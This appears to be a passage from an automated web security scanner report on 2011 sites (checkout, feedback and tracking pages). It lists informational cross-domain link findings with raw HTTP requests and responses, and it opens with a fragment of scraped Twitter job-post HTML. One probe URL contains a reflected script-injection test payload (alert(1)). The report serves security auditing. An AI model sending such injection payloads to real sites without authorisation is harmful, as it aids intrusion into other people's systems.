<span id="msgtxt32295910448824320" class="msgtxt en">Job opening: Regional Product Marketing Manager for Yahoo! Philippines - <a href="http://bit.ly/ijLcnO" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/link/32295910448824320');" rel="nofollow">http://bit.ly/ijLcnO</a>
...[SNIP]...
<a href="http://twitter.com/cmortensen" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/cmortensen');"><img alt="Brianswedding_sm_normal" src="http://a1.twimg.com/profile_images/724494378/BriansWedding_sm_normal.png" /></a>
...[SNIP]...
<span id="msgtxt32206878159147008" class="msgtxt en">Meet members of our team & find out what a day in the life of a Vodorian is like: <a href="http://bit.ly/fGpD61" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/link/32206878159147008');" rel="nofollow">http://bit.ly/fGpD61</a>
...[SNIP]...
<span class="source">via <a href="http://www.tweetdeck.com" rel="nofollow">TweetDeck</a>
...[SNIP]...
<a href="http://twitter.com/Hitchin_Jobs" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Hitchin_Jobs');"><img alt="Search4_logo_magnifying_glass_normal" src="http://a1.twimg.com/profile_images/1184151373/Search4_logo_magnifying_glass_normal.PNG" /></a>
...[SNIP]...
<span id="msgtxt32446184077393921" class="msgtxt en">Hitchin Job: Post Design Support Engineer, Stevenage: Our client is a World leader in defense applications.... <a href="http://dlvr.it/FYnv3" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446184077393921');" rel="nofollow">http://dlvr.it/FYnv3</a>
...[SNIP]...
<span class="source">via <a href="http://dlvr.it" rel="nofollow">dlvr.it</a>
...[SNIP]...
<a href="http://twitter.com/SanDiegoTopJobs" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SanDiegoTopJobs');"><img alt="Twitter_logo_normal" src="http://a3.twimg.com/profile_images/1149661580/twitter_logo_normal.png" /></a>
...[SNIP]...
<span id="msgtxt32446177735610368" class="msgtxt en">Sr. Systems Analyst: CA-San Diego, Reviews the scope and objectives of user requested system ch... <a href="http://bit.ly/hY6yZR" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446177735610368');" rel="nofollow">http://bit.ly/hY6yZR</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/RandstadTech" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/RandstadTech');"><img alt="Ran_stack_m1_colour_small_normal" src="http://a1.twimg.com/profile_images/703276101/RAN_stack_M1_colour_small_normal.gif" /></a>
...[SNIP]...
</a>: Sharepoint Developer Location: Stevenage Salary: GBP30k - GBP35k .. <a href="http://tinyurl.com/4pm5268" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446174015262720');" rel="nofollow">http://tinyurl.com/4pm5268</a>
...[SNIP]...
<span class="source">via <a href="http://www.broadbean.com" rel="nofollow">Adcourier</a>
...[SNIP]...
<a href="http://twitter.com/eBC_Jobs_NE" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/eBC_Jobs_NE');"><img alt="Ebayclassifiedsweb_73x73_normal" src="http://a2.twimg.com/profile_images/786613095/eBayClassifiedsWeb_73x73_normal.png" /></a>
...[SNIP]...
<span id="msgtxt32446171121197057" class="msgtxt pt">Baltimore: Restaurant Assistant Manager - (Baltimore) <a href="http://bit.ly/fWBBc6" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446171121197057');" rel="nofollow">http://bit.ly/fWBBc6</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/eBC_Jobs_NE" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/eBC_Jobs_NE');"><img alt="Ebayclassifiedsweb_73x73_normal" src="http://a2.twimg.com/profile_images/786613095/eBayClassifiedsWeb_73x73_normal.png" /></a>
...[SNIP]...
<span id="msgtxt32446167103053824" class="msgtxt es">Baltimore: Sales $300 to $900 per day - (Upper Marlboro) <a href="http://bit.ly/fEgtoI" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446167103053824');" rel="nofollow">http://bit.ly/fEgtoI</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/Startajob" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Startajob');"><img alt="Start_tel-rgb-4x4-jpg_normal" src="http://a1.twimg.com/profile_images/760071996/start_tel-RGB-4x4-jpg_normal.jpg" /></a>
...[SNIP]...
</a>: Technical Development Consultant Location: City of London Salary: GBP28k - GBP40k .. <a href="http://tinyurl.com/4onalh5" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446165370802176');" rel="nofollow">http://tinyurl.com/4onalh5</a>
...[SNIP]...
<span class="source">via <a href="http://www.broadbean.com" rel="nofollow">Adcourier</a>
...[SNIP]...
<a href="http://twitter.com/SanDiegoTopJobs" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SanDiegoTopJobs');"><img alt="Twitter_logo_normal" src="http://a3.twimg.com/profile_images/1149661580/twitter_logo_normal.png" /></a>
...[SNIP]...
<span id="msgtxt32446164385144832" class="msgtxt en">SP Unit Staff RN - Hospital, I281: CA-San Diego, As the leader of the health care team, provide... <a href="http://bit.ly/e778vQ" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446164385144832');" rel="nofollow">http://bit.ly/e778vQ</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/CFGCareers" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CFGCareers');"><img alt="Citizens_normal" src="http://a2.twimg.com/profile_images/1061280543/Citizens_normal.png" /></a>
...[SNIP]...
</a> , PA) <a href="http://bit.ly/gbs61S" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446155698733057');" rel="nofollow">http://bit.ly/gbs61S</a>
...[SNIP]...
<span class="source">via <a href="http://tweetmyjobs.com" rel="nofollow">SafeTweet by TweetMyJOBS</a>
...[SNIP]...
<a href="http://twitter.com/CFGCareers" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CFGCareers');"><img alt="Citizens_normal" src="http://a2.twimg.com/profile_images/1061280543/Citizens_normal.png" /></a>
...[SNIP]...
</a> , NY) <a href="http://bit.ly/gLQ0kB" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446154318811136');" rel="nofollow">http://bit.ly/gLQ0kB</a>
...[SNIP]...
<span class="source">via <a href="http://tweetmyjobs.com" rel="nofollow">SafeTweet by TweetMyJOBS</a>
...[SNIP]...
<a href="http://twitter.com/Work__Freelance" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Work__Freelance');"><img alt="Freelancex200_normal" src="http://a1.twimg.com/profile_images/1219638828/freelancex200_normal.jpg" /></a>
...[SNIP]...
<span id="msgtxt32446153115049984" class="msgtxt en">Freelance C++ Programming Job - PRJ2-11 only for ChinaCoCo <a href="http://bit.ly/fpsLyD" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446153115049984');" rel="nofollow">http://bit.ly/fpsLyD</a>
...[SNIP]...
<span class="source">via <a href="http://www.managetwit.com" rel="nofollow">ManageTwit</a>
...[SNIP]...
<a href="http://twitter.com/tmj_bos_banking" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/tmj_bos_banking');"><img alt="Tweetmyjobs_sq_normal" src="http://a0.twimg.com/profile_images/920042753/tweetmyjobs_sq_normal.jpg" /></a>
...[SNIP]...
</a> , MA) <a href="http://bit.ly/gmQkKr" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446151085002752');" rel="nofollow">http://bit.ly/gmQkKr</a>
...[SNIP]...
<span class="source">via <a href="http://tweetmyjobs.com" rel="nofollow">SafeTweet by TweetMyJOBS</a>
...[SNIP]...
<a href="http://twitter.com/CFGCareers" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CFGCareers');"><img alt="Citizens_normal" src="http://a2.twimg.com/profile_images/1061280543/Citizens_normal.png" /></a>
...[SNIP]...
</a> , NY) <a href="http://bit.ly/gbIsbI" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/32446151022084096');" rel="nofollow">http://bit.ly/gbIsbI</a>
...[SNIP]...
<span class="source">via <a href="http://tweetmyjobs.com" rel="nofollow">SafeTweet by TweetMyJOBS</a>
...[SNIP]...

17.168. https://secure.avangate.com/order/checkout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/checkout.php

Issue detail

The page was loaded from a URL containing a query string:

https://secure.avangate.com/order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be738649d%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea6894fb0eab

The response contains the following links to other domains:

https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014
https://3619-avangate.voxcdn.com/content/static/css/order/b20f2f51715a2528c13e0358fed83ea4/20101223093111.css?20101223093111
https://3619-avangate.voxcdn.com/content/static/js/order/fbd0228cbfaabeb6575937ad4e7cca9e/20110127123524.js?20110127133221
https://images.scanalert.com/meter/secure.avangate.com/12.gif
https://www.scanalert.com/RatingVerify?ref=secure.avangate.com

Request

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Wed, 02 Feb 2011 20:03:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=mhap601shf0fv6lib5ejliho2q6t64ul; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</title>


                                                                           <link rel="stylesheet" type="text/css" href="https://3619-avangate.voxcdn.com/content/static/css/order/b20f2f51715a2528c13e0358fed83ea4/20101223093111.css?20101223093111">


<a target="_blank"
href="https://www.scanalert.com/RatingVerify?ref=secure.avangate.com"><img
width="115" height="32" border="0"
src="//images.scanalert.com/meter/secure.avangate.com/12.gif"
alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...

<a target="_blank"
href="https://www.scanalert.com/RatingVerify?ref=secure.avangate.com"><img
width="115" height="32" border="0"
src="//images.scanalert.com/meter/secure.avangate.com/12.gif"
alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/fbd0228cbfaabeb6575937ad4e7cca9e/20110127123524.js?20110127133221"></script>
...[SNIP]...

17.169. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The page was loaded from a URL containing a query string:

https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

The response contains the following link to another domain:

https://billing.microsoft.com/home.aspx

Request

GET /ccc01/o.asp?ID=WpkpVtTB HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17222
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 15:40:59 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
<br />• For <a href="https://billing.microsoft.com/home.aspx" target="blank">Billing/Account Questions</a>
...[SNIP]...

17.170. http://seg.sharethis.com/getSegment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The page was loaded from a URL containing a query string:

http://seg.sharethis.com/getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-3&purl=null&jsref=

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296568568 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

Request

GET /getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-3&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.c99a19d7384984446908be08d7b2b8b1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 01 Feb 2011 13:56:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 276

       <html>
       <head><title>ShareThis Segmenter</title></head>
       <body>

       No Segment
       <img src="http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296568568 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

17.171. http://seg.sharethis.com/getSegment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The page was loaded from a URL containing a query string:

http://seg.sharethis.com/getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-2&purl=null&jsref=

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296570720 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 01 Feb 2011 14:32:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 276

       <html>
       <head><title>ShareThis Segmenter</title></head>
       <body>

       No Segment
       <img src="http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296570720 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

17.172. http://seg.sharethis.com/getSegment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The page was loaded from a URL containing a query string:

http://seg.sharethis.com/getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-2&purl=null&jsref=

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296568500 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 01 Feb 2011 13:55:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 276

       <html>
       <head><title>ShareThis Segmenter</title></head>
       <body>

       No Segment
       <img src="http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296568500 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

17.173. http://seg.sharethis.com/getSegment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The page was loaded from a URL containing a query string:

http://seg.sharethis.com/getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-3&purl=null&jsref=

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296568522 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 01 Feb 2011 13:55:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 276

       <html>
       <head><title>ShareThis Segmenter</title></head>
       <body>

       No Segment
       <img src="http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296568522 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==
userid:
</div>
       </body>
       </html>

17.174. https://sitesearch.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/util/

Issue detail

The page was loaded from a URL containing a query string:

https://sitesearch.omniture.com/center/util/?sp_fn=send_password

The response contains the following link to another domain:

https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

Request

GET /center/util/?sp_fn=send_password HTTP/1.1
Host: sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:34:21 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 sitesearch.omniture.com:86
X-Cache: MISS from sitesearch.omniture.com
Connection: close
Content-Length: 2895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights reserve
...[SNIP]...
</table>

<script type="text/javascript" src="https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js"></script>
...[SNIP]...

17.175. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://blog.brightlightsfilm.com/
http://blogs.indiewire.com/thompsononhollywood/2011/02/01/diaz_firth_team_for_coen_scripted_gambit/
http://blogs.suntimes.com/scanners/
http://chud.com/articles/
http://daily.greencine.com/
http://download.live.com/?sku=messenger
http://filmexperience.blogspot.com/
http://finalgirl.blogspot.com/
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110131181225_Robert-Redford.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110131182509_TheRitePoster2-560x827.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110131201721_the_fighter_movie_image_melissa_leo-600x399.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110201164929_CoreyHaim_150.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110201210500_wicked-witch.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110202023351_gambit_firth_diaz.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110202023627_336965619.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110202024744_Jack-Nicholson.jpg
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://selfstyledsiren.blogspot.com/
http://sergioleoneifr.blogspot.com/
http://sunsetgun.typepad.com/sunsetgun/
http://thehousenextdooronline.com/
http://theplaylist.blogspot.com/
http://www.avclub.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Corey+Feldman&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.cinematical.com/
http://www.cracked.com/article_18417_the-lighter-side-dark-side-5-villains-who-were-good.html
http://www.dailymail.co.uk/home/moslive/article-1350653/Jack-Nicholson-I-used-feel-irresistible-women-Not-more.html
http://www.delish.com/
http://www.fandor.com/blog/?p=2552
http://www.hitfix.com/
http://www.moviecitynews.com/
http://www.riskybusinessblog.com/
http://www.sheilaomalle.com/
http://www.sheilaomalley.com/
http://www.slashfilm.com/
http://www.sundance.org/videos/bcpid111173691001/?bckey=AQ%7E%7E,AAAAAFwqu74%7E,9_JrqmLhkoysgRMS2GGtZIqbsmNNeu6j&bclid=490887639001&bctid=770444292001
http://www.sunsetgun.com/
http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0
http://www.thewrap.com/
http://www.thewrap.com/movies/article/box-office-hopkins-rite-light-16m-still-no-1-24328
http://www.vanityfair.com/online/wolcott
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661285&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.msn.com%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0488e83a7ecc4a97a2717a947cdf9c7e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=356F1C2B733B4159B0ADCC41F98BD2A6; domain=.entertainment.msn.com; expires=Sun, 21-Aug-2011 15:41:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 51166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661285&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.msn.com%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg" />What if movie posters just cut to the chase? Damn the <i>
...[SNIP]...
